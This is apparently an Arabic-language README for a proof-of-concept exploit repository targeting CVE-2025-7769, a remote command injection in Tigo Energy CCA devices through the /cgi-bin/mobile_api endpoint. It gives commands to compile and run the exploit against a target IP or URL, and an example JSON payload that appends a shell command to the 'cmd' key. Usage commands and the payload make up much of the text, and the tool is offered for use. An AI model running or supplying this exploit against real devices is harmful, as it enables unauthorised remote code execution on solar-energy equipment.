
PoC لحقن أمر عبر نقطة نهاية DEVICE_PING
يحتوي هذا المستودع على إثبات المفهوم (PoC) لاستغلال ثغرة CVE‑2025‑7769، وهي ثغرة حرجة في حقن الأوامر عن بُعد موجودة في أجهزة Tigo Energy CCA التي تعرض نقطة النهاية /cgi-bin/mobile_api.
يتم تشغيل الثغرة عن طريق حقن أوامر نظام التشغيل عبر مفتاح JSON cmd، حيث يتم دمج الإدخال غير المصفى مباشرة في استدعاء نظام، مما يسمح بتنفيذ التعليمات البرمجية عن بُعد (RCE) بشكل كامل على الجهاز.
gcc exploit.c argparse.c -o CVE-2025-7769 -lcurl
./CVE-2025-7769 -i 10.0.2.15 -p 80 -v
استبدل 10.0.2.15 بعنوان IP الهدف.
استخدم -u http://target.com إذا كنت تريد تمرير عنوان URL أساسي كامل بدلاً من IP/المنفذ.
مثال للحمولة:
{
"cmd": "DEVICE_PING;id",
"dev": 2,
"ver": 1
}
رخصة MIT